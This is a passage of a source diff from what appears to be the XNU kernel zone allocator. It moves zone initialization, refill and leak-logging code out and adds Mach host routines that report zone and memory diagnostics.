+       return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL);
+}
 
-       /*
-        * Zone "map" setup:
-        *
-        * [  VA_RESTRICTED  ] <-- LP64 only
-        * [  SINGLE_GUARD   ] <-- LP64 only
-        * [  meta           ]
-        * [  SINGLE_GUARD   ]
-        * [  map<i>         ] \ for each extra map
-        * [  MULTI_GUARD    ] /
-        */
-       remaining_size = zone_map_size;
-#if defined(__LP64__)
-       remaining_size -= SINGLE_GUARD;
-#endif
-       remaining_size -= zone_meta_size + SINGLE_GUARD;
-       remaining_size -= MULTI_GUARD * (zone_last_submap_idx -
-           Z_SUBMAP_IDX_GENERAL_MAP + 1);
 
-#if VM_MAX_TAG_ZONES
-       if (zone_tagging_on) {
-               zone_tagging_init(zone_map_size);
-       }
-#endif
+kern_return_t
+mach_memory_info(
+       host_priv_t             host,
+       mach_zone_name_array_t  *namesp,
+       mach_msg_type_number_t  *namesCntp,
+       mach_zone_info_array_t  *infop,
+       mach_msg_type_number_t  *infoCntp,
+       mach_memory_info_array_t *memoryInfop,
+       mach_msg_type_number_t   *memoryInfoCntp)
+{
+       mach_zone_name_t        *names;
+       vm_offset_t             names_addr;
+       vm_size_t               names_size;
 
-       uint64_t remaining_denom = 0;
-       uint64_t zone_sub_map_numer[Z_SUBMAP_IDX_COUNT] = {
-#ifdef __LP64__
-               [Z_SUBMAP_IDX_VA_RESTRICTED_MAP] = 20,
-#endif /* defined(__LP64__) */
-               [Z_SUBMAP_IDX_GENERAL_MAP]       = 40,
-               [Z_SUBMAP_IDX_BAG_OF_BYTES_MAP]  = 40,
-       };
+       mach_zone_info_t        *info;
+       vm_offset_t             info_addr;
+       vm_size_t               info_size;
 
-       for (unsigned idx = 0; idx <= zone_last_submap_idx; idx++) {
-#if DEBUG || DEVELOPMENT
-               char submap_name[MAX_SUBMAP_NAME];
-               snprintf(submap_name, MAX_SUBMAP_NAME, "submap%d", idx);
-               PE_parse_boot_argn(submap_name, &zone_sub_map_numer[idx], sizeof(uint64_t));
-#endif
-               remaining_denom += zone_sub_map_numer[idx];
-       }
+       mach_memory_info_t      *memory_info;
+       vm_offset_t             memory_info_addr;
+       vm_size_t               memory_info_size;
+       vm_size_t               memory_info_vmsize;
+       unsigned int            num_info;
 
-       /*
-        * And now allocate the various pieces of VA and submaps.
-        *
-        * Make a first allocation of contiguous VA, that we'll deallocate,
-        * and we'll carve-out memory in that range again linearly.
-        * The kernel is stil single threaded at this stage.
-        */
+       unsigned int            max_zones, used_zones, i;
+       mach_zone_name_t        *zn;
+       mach_zone_info_t        *zi;
+       kern_return_t           kr;
 
-       struct zone_map_range *map_range = &zone_info.zi_map_range;
+       uint64_t                zones_collectable_bytes = 0;
 
-       *map_range = zone_init_allocate_va(&submap_min, zone_map_size, false);
-       submap_min = map_range->min_address;
-       kmem_free(kernel_map, submap_min, zone_map_size);
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
+       }
+#if CONFIG_DEBUGGER_FOR_ZONE_INFO
+       if (!PE_i_can_has_debugger(NULL)) {
+               return KERN_INVALID_HOST;
+       }
+#endif
 
-#if defined(__LP64__)
        /*
-        * Allocate `Z_SUBMAP_IDX_VA_RESTRICTED_MAP` first because its VA range
-        * can't go beyond RESTRICTED_VA_MAX for the vm_page_t packing to work.
+        *      We assume that zones aren't freed once allocated.
+        *      We won't pick up any zones that are allocated later.
         */
-       zone_submap_init(&submap_min, Z_SUBMAP_IDX_VA_RESTRICTED_MAP,
-           zone_sub_map_numer[Z_SUBMAP_IDX_VA_RESTRICTED_MAP], &remaining_denom,
-           &remaining_size, SINGLE_GUARD);
-#endif /* defined(__LP64__) */
 
-       /*
-        * Allocate metadata array
-        */
-       zone_info.zi_meta_range =
-           zone_init_allocate_va(&submap_min, zone_meta_size, true);
-       zone_init_allocate_va(&submap_min, SINGLE_GUARD, true);
+       max_zones = os_atomic_load(&num_zones, relaxed);
 
-       zone_info.zi_array_base =
-           (struct zone_page_metadata *)zone_info.zi_meta_range.min_address -
-           zone_pva_from_addr(map_range->min_address).packed_address;
+       names_size = round_page(max_zones * sizeof *names);
+       kr = kmem_alloc_pageable(ipc_kernel_map,
+           &names_addr, names_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               return kr;
+       }
+       names = (mach_zone_name_t *) names_addr;
 
-       /*
-        * Allocate other submaps
-        */
-       for (unsigned idx = Z_SUBMAP_IDX_GENERAL_MAP; idx <= zone_last_submap_idx; idx++) {
-               zone_submap_init(&submap_min, idx, zone_sub_map_numer[idx],
-                   &remaining_denom, &remaining_size, MULTI_GUARD);
+       info_size = round_page(max_zones * sizeof *info);
+       kr = kmem_alloc_pageable(ipc_kernel_map,
+           &info_addr, info_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               kmem_free(ipc_kernel_map,
+                   names_addr, names_size);
+               return kr;
        }
+       info = (mach_zone_info_t *) info_addr;
 
-       vm_map_t general_map = zone_submaps[Z_SUBMAP_IDX_GENERAL_MAP];
-       zone_info.zi_general_range.min_address = vm_map_min(general_map);
-       zone_info.zi_general_range.max_address = vm_map_max(general_map);
+       zn = &names[0];
+       zi = &info[0];
 
-       assert(submap_min == map_range->max_address);
+       used_zones = max_zones;
+       for (i = 0; i < max_zones; i++) {
+               if (!get_zone_info(&(zone_array[i]), zn, zi)) {
+                       used_zones--;
+                       continue;
+               }
+               zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable);
+               zn++;
+               zi++;
+       }
 
-#if CONFIG_GZALLOC
-       gzalloc_init(zone_map_size);
-#endif
+       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names);
+       *namesCntp = used_zones;
 
-       zone_create_flags_t kma_flags = ZC_NOCACHING |
-           ZC_NOGC | ZC_NOENCRYPT | ZC_NOGZALLOC | ZC_NOCALLOUT |
-           ZC_KASAN_NOQUARANTINE | ZC_KASAN_NOREDZONE;
+       *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info);
+       *infoCntp = used_zones;
 
-       (void)zone_create_ext("vm.permanent", 1, kma_flags,
-           ZONE_ID_PERMANENT, ^(zone_t z){
-               z->permanent = true;
-               z->z_elem_size = 1;
-               z->pcpu_elem_size = 1;
-#if defined(__LP64__)
-               z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP;
-#endif
-       });
-       (void)zone_create_ext("vm.permanent.percpu", 1, kma_flags | ZC_PERCPU,
-           ZONE_ID_PERCPU_PERMANENT, ^(zone_t z){
-               z->permanent = true;
-               z->z_elem_size = 1;
-               z->pcpu_elem_size = zpercpu_count();
-#if defined(__LP64__)
-               z->submap_idx = Z_SUBMAP_IDX_VA_RESTRICTED_MAP;
-#endif
-       });
+       num_info = 0;
+       memory_info_addr = 0;
 
-       /*
-        * Now fix the zones that are missing their zone stats
-        * we don't really know if zfree()s happened so our stats
-        * are slightly off for early boot. Â¯\_(ツ)_/¯
-        */
-       zone_index_foreach(idx) {
-               zone_t tz = &zone_array[idx];
+       if (memoryInfop && memoryInfoCntp) {
+               vm_map_copy_t           copy;
+               num_info = vm_page_diagnose_estimate();
+               memory_info_size = num_info * sizeof(*memory_info);
+               memory_info_vmsize = round_page(memory_info_size);
+               kr = kmem_alloc_pageable(ipc_kernel_map,
+                   &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC);
+               if (kr != KERN_SUCCESS) {
+                       return kr;
+               }
 
-               if (tz->z_self) {
-                       zone_stats_t zs = zalloc_percpu_permanent_type(struct zone_stats);
+               kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize,
+                   VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
+               assert(kr == KERN_SUCCESS);
 
-                       zpercpu_get_cpu(zs, 0)->zs_mem_allocated +=
-                           (tz->countavail - tz->countfree) *
-                           zone_elem_size(tz);
-                       assert(tz->z_stats == NULL);
-                       tz->z_stats = zs;
-#if ZONE_ENABLE_LOGGING
-                       if (tz->zone_logging && !tz->zlog_btlog) {
-                               zone_enable_logging(tz);
-                       }
-#endif
-               }
-       }
+               memory_info = (mach_memory_info_t *) memory_info_addr;
+               vm_page_diagnose(memory_info, num_info, zones_collectable_bytes);
 
-#if CONFIG_ZLEAKS
-       /*
-        * Initialize the zone leak monitor
-        */
-       zleak_init(zone_map_size);
-#endif /* CONFIG_ZLEAKS */
+               kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE);
+               assert(kr == KERN_SUCCESS);
 
-#if VM_MAX_TAG_ZONES
-       if (zone_tagging_on) {
-               vm_allocation_zones_init();
-       }
-#endif
-}
-STARTUP(ZALLOC, STARTUP_RANK_FIRST, zone_init);
+               kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr,
+                   (vm_map_size_t)memory_info_size, TRUE, &copy);
+               assert(kr == KERN_SUCCESS);
 
-__startup_func
-static void
-zone_set_foreign_range(
-       vm_offset_t range_min,
-       vm_offset_t range_max)
-{
-       zone_info.zi_foreign_range.min_address = range_min;
-       zone_info.zi_foreign_range.max_address = range_max;
-}
+               *memoryInfop = (mach_memory_info_t *) copy;
+               *memoryInfoCntp = num_info;
+       }
 
-__startup_func
-vm_offset_t
-zone_foreign_mem_init(vm_size_t size)
-{
-       vm_offset_t mem = (vm_offset_t) pmap_steal_memory(size);
-       zone_set_foreign_range(mem, mem + size);
-       return mem;
+       return KERN_SUCCESS;
 }
 
-#pragma mark zalloc
-
-#if KASAN_ZALLOC
-/*
- * Called from zfree() to add the element being freed to the KASan quarantine.
- *
- * Returns true if the newly-freed element made it into the quarantine without
- * displacing another, false otherwise. In the latter case, addrp points to the
- * address of the displaced element, which will be freed by the zone.
- */
-static bool
-kasan_quarantine_freed_element(
-       zone_t          *zonep,         /* the zone the element is being freed to */
-       void            **addrp)        /* address of the element being freed */
+kern_return_t
+mach_zone_info_for_zone(
+       host_priv_t                     host,
+       mach_zone_name_t        name,
+       mach_zone_info_t        *infop)
 {
-       zone_t zone = *zonep;
-       void *addr = *addrp;
-
-       /*
-        * Resize back to the real allocation size and hand off to the KASan
-        * quarantine. `addr` may then point to a different allocation, if the
-        * current element replaced another in the quarantine. The zone then
-        * takes ownership of the swapped out free element.
-        */
-       vm_size_t usersz = zone_elem_size(zone) - 2 * zone->kasan_redzone;
-       vm_size_t sz = usersz;
+       zone_t zone_ptr;
 
-       if (addr && zone->kasan_redzone) {
-               kasan_check_free((vm_address_t)addr, usersz, KASAN_HEAP_ZALLOC);
-               addr = (void *)kasan_dealloc((vm_address_t)addr, &sz);
-               assert(sz == zone_elem_size(zone));
-       }
-       if (addr && !zone->kasan_noquarantine) {
-               kasan_free(&addr, &sz, KASAN_HEAP_ZALLOC, zonep, usersz, true);
-               if (!addr) {
-                       return TRUE;
-               }
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
        }
-       if (addr && zone->kasan_noquarantine) {
-               kasan_unpoison(addr, zone_elem_size(zone));
+#if CONFIG_DEBUGGER_FOR_ZONE_INFO
+       if (!PE_i_can_has_debugger(NULL)) {
+               return KERN_INVALID_HOST;
        }
-       *addrp = addr;
-       return FALSE;
-}
-
-#endif /* KASAN_ZALLOC */
+#endif
 
-static inline bool
-zone_needs_async_refill(zone_t zone)
-{
-       if (zone->countfree != 0 || zone->async_pending || zone->no_callout) {
-               return false;
+       if (infop == NULL) {
+               return KERN_INVALID_ARGUMENT;
        }
 
-       return zone->expandable || zone->page_count < zone->page_count_max;
-}
-
-__attribute__((noinline))
-static void
-zone_refill_synchronously_locked(
-       zone_t         zone,
-       zalloc_flags_t flags)
-{
-       thread_t thr = current_thread();
-       bool     set_expanding_vm_priv = false;
-       zone_pva_t orig = zone->pages_intermediate;
-
-       while ((flags & Z_NOWAIT) == 0 && (zone->permanent
-           ? zone_pva_is_equal(zone->pages_intermediate, orig)
-           : zone->countfree == 0)) {
+       zone_ptr = ZONE_NULL;
+       zone_foreach(z) {
                /*
-                * zone is empty, try to expand it
-                *
-                * Note that we now allow up to 2 threads (1 vm_privliged and
-                * 1 non-vm_privliged) to expand the zone concurrently...
-                *
-                * this is necessary to avoid stalling vm_privileged threads
-                * running critical code necessary to continue
-                * compressing/swapping pages (i.e. making new free pages) from
-                * stalling behind non-vm_privileged threads waiting to acquire
-                * free pages when the vm_page_free_count is below the
-                * vm_page_free_reserved limit.
+                * Append kalloc heap name to zone name (if zone is used by kalloc)
                 */
-               if ((zone->expanding_no_vm_priv || zone->expanding_vm_priv) &&
-                   (((thr->options & TH_OPT_VMPRIV) == 0) || zone->expanding_vm_priv)) {
-                       /*
-                        * This is a non-vm_privileged thread and a non-vm_privileged or
-                        * a vm_privileged thread is already expanding the zone...
-                        *    OR
-                        * this is a vm_privileged thread and a vm_privileged thread is
-                        * already expanding the zone...
-                        *
-                        * In either case wait for a thread to finish, then try again.
-                        */
-                       zone->waiting = true;
-                       assert_wait(zone, THREAD_UNINT);
-                       unlock_zone(zone);
-                       thread_block(THREAD_CONTINUE_NULL);
-                       lock_zone(zone);
-                       continue;
-               }
-
-               if (zone->page_count >= zone->page_count_max) {
-                       if (zone->exhaustible) {
-                               break;
-                       }
-                       if (zone->expandable) {
-                               /*
-                                * If we're expandable, just don't go through this again.
-                                */
-                               zone->page_count_max = ~0u;
-                       } else {
-                               unlock_zone(zone);
+               char temp_zone_name[MAX_ZONE_NAME] = "";
+               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
+                   zone_heap_name(z), z->z_name);
 
-                               panic_include_zprint = true;
-#if CONFIG_ZLEAKS
-                               if (zleak_state & ZLEAK_STATE_ACTIVE) {
-                                       panic_include_ztrace = true;
-                               }
-#endif /* CONFIG_ZLEAKS */
-                               panic("zalloc: zone \"%s\" empty.", zone->z_name);
-                       }
+               /* Find the requested zone by name */
+               if (track_this_zone(temp_zone_name, name.mzn_name)) {
+                       zone_ptr = z;
+                       break;
                }
+       }
 
-               /*
-                * It is possible that a BG thread is refilling/expanding the zone
-                * and gets pre-empted during that operation. That blocks all other
-                * threads from making progress leading to a watchdog timeout. To
-                * avoid that, boost the thread priority using the rwlock boost
-                */
-               set_thread_rwlock_boost();
+       /* No zones found with the requested zone name */
+       if (zone_ptr == ZONE_NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
 
-               if ((thr->options & TH_OPT_VMPRIV)) {
-                       zone->expanding_vm_priv = true;
-                       set_expanding_vm_priv = true;
-               } else {
-                       zone->expanding_no_vm_priv = true;
-               }
+       if (get_zone_info(zone_ptr, NULL, infop)) {
+               return KERN_SUCCESS;
+       }
+       return KERN_FAILURE;
+}
 
-               zone_replenish_locked(zone, flags, false);
+kern_return_t
+mach_zone_info_for_largest_zone(
+       host_priv_t                     host,
+       mach_zone_name_t        *namep,
+       mach_zone_info_t        *infop)
+{
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
+       }
+#if CONFIG_DEBUGGER_FOR_ZONE_INFO
+       if (!PE_i_can_has_debugger(NULL)) {
+               return KERN_INVALID_HOST;
+       }
+#endif
 
-               if (set_expanding_vm_priv == true) {
-                       zone->expanding_vm_priv = false;
-               } else {
-                       zone->expanding_no_vm_priv = false;
-               }
+       if (namep == NULL || infop == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
 
-               if (zone->waiting) {
-                       zone->waiting = false;
-                       thread_wakeup(zone);
-               }
-               clear_thread_rwlock_boost();
+       if (get_zone_info(zone_find_largest(), namep, infop)) {
+               return KERN_SUCCESS;
+       }
+       return KERN_FAILURE;
+}
+
+uint64_t
+get_zones_collectable_bytes(void)
+{
+       uint64_t zones_collectable_bytes = 0;
+       mach_zone_info_t zi;
 
-               if (zone->countfree == 0) {
-                       assert(flags & Z_NOPAGEWAIT);
-                       break;
+       zone_foreach(z) {
+               if (get_zone_info(z, NULL, &zi)) {
+                       zones_collectable_bytes +=
+                           GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable);
                }
        }
 
-       if ((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) &&
-           zone_needs_async_refill(zone) && !vm_pool_low()) {
-               zone->async_pending = true;
-               unlock_zone(zone);
-               thread_call_enter(&call_async_alloc);
-               lock_zone(zone);
-               assert(zone->z_self == zone);
-       }
+       return zones_collectable_bytes;
 }
 
-__attribute__((noinline))
-static void
-zone_refill_asynchronously_locked(zone_t zone)
+kern_return_t
+mach_zone_get_zlog_zones(
+       host_priv_t                             host,
+       mach_zone_name_array_t  *namesp,
+       mach_msg_type_number_t  *namesCntp)
 {
-       uint32_t min_free = zone->prio_refill_count / 2;
-       uint32_t resv_free = zone->prio_refill_count / 4;
-       thread_t thr = current_thread();
+#if ZONE_ENABLE_LOGGING
+       unsigned int max_zones, logged_zones, i;
+       kern_return_t kr;
+       zone_t zone_ptr;
+       mach_zone_name_t *names;
+       vm_offset_t names_addr;
+       vm_size_t names_size;
 
-       /*
-        * Nothing to do if there are plenty of elements.
-        */
-       while (zone->countfree <= min_free) {
-               /*
-                * Wakeup the replenish thread if not running.
-                */
-               if (!zone->zone_replenishing) {
-                       lck_spin_lock(&zone_replenish_lock);
-                       assert(zone_replenish_active < zone_replenish_max_threads);
-                       ++zone_replenish_active;
-                       lck_spin_unlock(&zone_replenish_lock);
-                       zone->zone_replenishing = true;
-                       zone_replenish_wakeups_initiated++;
-                       thread_wakeup(&zone->prio_refill_count);
-               }
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
+       }
 
-               /*
-                * We'll let VM_PRIV threads to continue to allocate until the
-                * reserve drops to 25%. After that only TH_OPT_ZONE_PRIV threads
-                * may continue.
-                *
-                * TH_OPT_ZONE_PRIV threads are the GC thread and a replenish thread itself.
-                * Replenish threads *need* to use the reserve. GC threads need to
-                * get through the current allocation, but then will wait at a higher
-                * level after they've dropped any locks which would deadlock the
-                * replenish thread.
-                */
-               if ((zone->countfree > resv_free && (thr->options & TH_OPT_VMPRIV)) ||
-                   (thr->options & TH_OPT_ZONE_PRIV)) {
-                       break;
-               }
+       if (namesp == NULL || namesCntp == NULL) {
+               return KERN_INVALID_ARGUMENT;
+       }
 
-               /*
-                * Wait for the replenish threads to add more elements for us to allocate from.
-                */
-               zone_replenish_throttle_count++;
-               unlock_zone(zone);
-               assert_wait_timeout(zone, THREAD_UNINT, 1, NSEC_PER_MSEC);
-               thread_block(THREAD_CONTINUE_NULL);
-               lock_zone(zone);
+       max_zones = os_atomic_load(&num_zones, relaxed);
 
-               assert(zone->z_self == zone);
+       names_size = round_page(max_zones * sizeof *names);
+       kr = kmem_alloc_pageable(ipc_kernel_map,
+           &names_addr, names_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               return kr;
        }
+       names = (mach_zone_name_t *) names_addr;
 
-       /*
-        * If we're here because of zone_gc(), we didn't wait for
-        * zone_replenish_thread to finish.  So we need to ensure that
-        * we will successfully grab an element.
-        *
-        * zones that have a replenish thread configured.
-        * The value of (refill_level / 2) in the previous bit of code should have
-        * given us headroom even though this thread didn't wait.
-        */
-       if (thr->options & TH_OPT_ZONE_PRIV) {
-               assert(zone->countfree != 0);
+       zone_ptr = ZONE_NULL;
+       logged_zones = 0;
+       for (i = 0; i < max_zones; i++) {
+               zone_t z = &(zone_array[i]);
+               assert(z != ZONE_NULL);
+
+               /* Copy out the zone name if zone logging is enabled */
+               if (z->zlog_btlog) {
+                       get_zone_info(z, &names[logged_zones], NULL);
+                       logged_zones++;
+               }
        }
+
+       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names);
+       *namesCntp = logged_zones;
+
+       return KERN_SUCCESS;
+
+#else /* ZONE_ENABLE_LOGGING */
+#pragma unused(host, namesp, namesCntp)
+       return KERN_FAILURE;
+#endif /* ZONE_ENABLE_LOGGING */
 }
 
-#if ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS
-__attribute__((noinline))
-static void
-zalloc_log_or_trace_leaks(zone_t zone, vm_offset_t addr)
+kern_return_t
+mach_zone_get_btlog_records(
+       host_priv_t                             host,
+       mach_zone_name_t                name,
+       zone_btrecord_array_t   *recsp,
+       mach_msg_type_number_t  *recsCntp)
 {
-       uintptr_t       zbt[MAX_ZTRACE_DEPTH];  /* used in zone leak logging and zone leak detection */
-       unsigned int    numsaved = 0;
+#if DEBUG || DEVELOPMENT
+       unsigned int numrecs = 0;
+       zone_btrecord_t *recs;
+       kern_return_t kr;
+       zone_t zone_ptr;
+       vm_offset_t recs_addr;
+       vm_size_t recs_size;
 
-#if ZONE_ENABLE_LOGGING
-       if (DO_LOGGING(zone)) {
-               numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                   __builtin_frame_address(0), NULL);
-               btlog_add_entry(zone->zlog_btlog, (void *)addr,
-                   ZOP_ALLOC, (void **)zbt, numsaved);
+       if (host == HOST_NULL) {
+               return KERN_INVALID_HOST;
        }
-#endif
 
-#if CONFIG_ZLEAKS
-       /*
-        * Zone leak detection: capture a backtrace every zleak_sample_factor
-        * allocations in this zone.
-        */
-       if (__improbable(zone->zleak_on)) {
-               if (sample_counter(&zone->zleak_capture, zleak_sample_factor)) {
-                       /* Avoid backtracing twice if zone logging is on */
-                       if (numsaved == 0) {
-                               numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                                   __builtin_frame_address(1), NULL);
-                       }
-                       /* Sampling can fail if another sample is happening at the same time in a different zone. */
-                       if (!zleak_log(zbt, addr, numsaved, zone_elem_size(zone))) {
-                               /* If it failed, roll back the counter so we sample the next allocation instead. */
-                               zone->zleak_capture = zleak_sample_factor;
-                       }
-               }
+       if (recsp == NULL || recsCntp == NULL) {
+               return KERN_INVALID_ARGUMENT;
        }
 
-       if (__improbable(zone_leaks_scan_enable &&
-           !(zone_elem_size(zone) & (sizeof(uintptr_t) - 1)))) {
-               unsigned int count, idx;
-               /* Fill element, from tail, with backtrace in reverse order */
-               if (numsaved == 0) {
-                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                           __builtin_frame_address(1), NULL);
-               }
-               count = (unsigned int)(zone_elem_size(zone) / sizeof(uintptr_t));
-               if (count >= numsaved) {
-                       count = numsaved - 1;
-               }
-               for (idx = 0; idx < count; idx++) {
-                       ((uintptr_t *)addr)[count - 1 - idx] = zbt[idx + 1];
+       zone_ptr = ZONE_NULL;
+       zone_foreach(z) {
+               /*
+                * Append kalloc heap name to zone name (if zone is used by kalloc)
+                */
+               char temp_zone_name[MAX_ZONE_NAME] = "";
+               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
+                   zone_heap_name(z), z->z_name);
+
+               /* Find the requested zone by name */
+               if (track_this_zone(temp_zone_name, name.mzn_name)) {
+                       zone_ptr = z;
+                       break;
                }
        }
-#endif /* CONFIG_ZLEAKS */
-}
 
-static inline bool
-zalloc_should_log_or_trace_leaks(zone_t zone, vm_size_t elem_size)
-{
-#if ZONE_ENABLE_LOGGING
-       if (DO_LOGGING(zone)) {
-               return true;
+       /* No zones found with the requested zone name */
+       if (zone_ptr == ZONE_NULL) {
+               return KERN_INVALID_ARGUMENT;
        }
-#endif
-#if CONFIG_ZLEAKS
-       /*
-        * Zone leak detection: capture a backtrace every zleak_sample_factor
-        * allocations in this zone.
-        */
-       if (zone->zleak_on) {
-               return true;
+
+       /* Logging not turned on for the requested zone */
+       if (!DO_LOGGING(zone_ptr)) {
+               return KERN_FAILURE;
        }
-       if (zone_leaks_scan_enable && !(elem_size & (sizeof(uintptr_t) - 1))) {
-               return true;
+
+       /* Allocate memory for btlog records */
+       numrecs = (unsigned int)(get_btlog_records_count(zone_ptr->zlog_btlog));
+       recs_size = round_page(numrecs * sizeof *recs);
+
+       kr = kmem_alloc_pageable(ipc_kernel_map, &recs_addr, recs_size, VM_KERN_MEMORY_IPC);
+       if (kr != KERN_SUCCESS) {
+               return kr;
        }
-#endif /* CONFIG_ZLEAKS */
-       return false;
-}
-#endif /* ZONE_ENABLE_LOGGING || CONFIG_ZLEAKS */
-#if ZONE_ENABLE_LOGGING
 
-__attribute__((noinline))
-static void
-zfree_log_trace(zone_t zone, vm_offset_t addr)
-{
        /*
-        * See if we're doing logging on this zone.
-        *
-        * There are two styles of logging used depending on
-        * whether we're trying to catch a leak or corruption.
+        * We will call get_btlog_records() below which populates this region while holding a spinlock
+        * (the btlog lock). So these pages need to be wired.
         */
-       if (__improbable(DO_LOGGING(zone))) {
-               if (corruption_debug_flag) {
-                       uintptr_t       zbt[MAX_ZTRACE_DEPTH];
-                       unsigned int    numsaved;
-                       /*
-                        * We're logging to catch a corruption.
-                        *
-                        * Add a record of this zfree operation to log.
-                        */
-                       numsaved = backtrace_frame(zbt, MAX_ZTRACE_DEPTH,
-                           __builtin_frame_address(1), NULL);
-                       btlog_add_entry(zone->zlog_btlog, (void *)addr, ZOP_FREE,
-                           (void **)zbt, numsaved);
-               } else {
-                       /*
-                        * We're logging to catch a leak.
-                        *
-                        * Remove any record we might have for this element
-                        * since it's being freed.  Note that we may not find it
-                        * if the buffer overflowed and that's OK.
-                        *
-                        * Since the log is of a limited size, old records get
-                        * overwritten if there are more zallocs than zfrees.
-                        */
-                       btlog_remove_entries_for_element(zone->zlog_btlog, (void *)addr);
-               }
-       }
-}
-#endif /* ZONE_ENABLE_LOGGING */
+       kr = vm_map_wire_kernel(ipc_kernel_map, recs_addr, recs_addr + recs_size,
+           VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
+       assert(kr == KERN_SUCCESS);
 
-/*
- * Removes an element from the zone's free list, returning 0 if the free list is empty.
- * Verifies that the next-pointer and backup next-pointer are intact,
- * and verifies that a poisoned element hasn't been modified.
- */
-vm_offset_t
-zalloc_direct_locked(
-       zone_t              zone,
-       zalloc_flags_t      flags __unused,
-       vm_size_t           waste __unused)
-{
-       struct zone_page_metadata *page_meta;
-       zone_addr_kind_t kind = ZONE_ADDR_NATIVE;
-       vm_offset_t element, page, validate_bit = 0;
-
-       /* if zone is empty, bail */
-       if (!zone_pva_is_null(zone->pages_any_free_foreign)) {
-               kind = ZONE_ADDR_FOREIGN;
-               page_meta = zone_pva_to_meta(zone->pages_any_free_foreign, kind);
-               page = (vm_offset_t)page_meta;
-       } else if (!zone_pva_is_null(zone->pages_intermediate)) {
-               page_meta = zone_pva_to_meta(zone->pages_intermediate, kind);
-               page = zone_pva_to_addr(zone->pages_intermediate);
-       } else if (!zone_pva_is_null(zone->pages_all_free)) {
-               page_meta = zone_pva_to_meta(zone->pages_all_free, kind);
-               page = zone_pva_to_addr(zone->pages_all_free);
-               if (os_sub_overflow(zone->allfree_page_count,
-                   page_meta->zm_page_count, &zone->allfree_page_count)) {
-                       zone_accounting_panic(zone, "allfree_page_count wrap-around");
-               }
-       } else {
-               zone_accounting_panic(zone, "countfree corruption");
-       }
+       recs = (zone_btrecord_t *)recs_addr;
+       get_btlog_records(zone_ptr->zlog_btlog, recs, &numrecs);
 
-       if (!zone_has_index(zone, page_meta->zm_index)) {
-               zone_page_metadata_index_confusion_panic(zone, page, page_meta);
-       }
+       kr = vm_map_unwire(ipc_kernel_map, recs_addr, recs_addr + recs_size, FALSE);
+       assert(kr == KERN_SUCCESS);
 
-       element = zone_page_meta_get_freelist(zone, page_meta, page);
+       *recsp = (zone_btrecord_t *) create_vm_map_copy(recs_addr, recs_size, numrecs * sizeof *recs);
+       *recsCntp = numrecs;
 
-       vm_offset_t *primary = (vm_offset_t *) element;
-       vm_offset_t *backup  = get_backup_ptr(zone_elem_size(zone), primary);
+       return KERN_SUCCESS;
 
-       /*
-        * since the primary next pointer is xor'ed with zp_nopoison_cookie
-        * for obfuscation, retrieve the original value back
-        */
-       vm_offset_t  next_element          = *primary ^ zp_nopoison_cookie;
-       vm_offset_t  next_element_primary  = *primary;
-       vm_offset_t  next_element_backup   = *backup;
+#else /* DEBUG || DEVELOPMENT */
+#pragma unused(host, name, recsp, recsCntp)
+       return KERN_FAILURE;
+#endif /* DEBUG || DEVELOPMENT */
+}
+
+
+#if DEBUG || DEVELOPMENT
+
+kern_return_t
+mach_memory_info_check(void)
+{
+       mach_memory_info_t * memory_info;
+       mach_memory_info_t * info;
+       unsigned int         num_info;
+       vm_offset_t          memory_info_addr;
+       kern_return_t        kr;
+       size_t               memory_info_size, memory_info_vmsize;
+       uint64_t             top_wired, zonestotal, total;
 
-       /*
-        * backup_ptr_mismatch_panic will determine what next_element
-        * should have been, and print it appropriately
-        */
-       if (!zone_page_meta_is_sane_element(zone, page_meta, page, next_element, kind)) {
-               backup_ptr_mismatch_panic(zone, page_meta, page, element);
-       }
+       num_info = vm_page_diagnose_estimate();
+       memory_info_size = num_info * sizeof(*memory_info);
+       memory_info_vmsize = round_page(memory_info_size);
+       kr = kmem_alloc(kernel_map, &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_DIAG);
+       assert(kr == KERN_SUCCESS);
 
-       /* Check the backup pointer for the regular cookie */
-       if (__improbable(next_element_primary != next_element_backup)) {
-               /* Check for the poisoned cookie instead */
-               if (__improbable(next_element != (next_element_backup ^ zp_poisoned_cookie))) {
-                       /* Neither cookie is valid, corruption has occurred */
-                       backup_ptr_mismatch_panic(zone, page_meta, page, element);
-               }
+       memory_info = (mach_memory_info_t *) memory_info_addr;
+       vm_page_diagnose(memory_info, num_info, 0);
 
-               /*
-                * Element was marked as poisoned, so check its integrity before using it.
-                */
-               validate_bit = ZALLOC_ELEMENT_NEEDS_VALIDATION;
-       } else if (zone->zfree_clear_mem) {
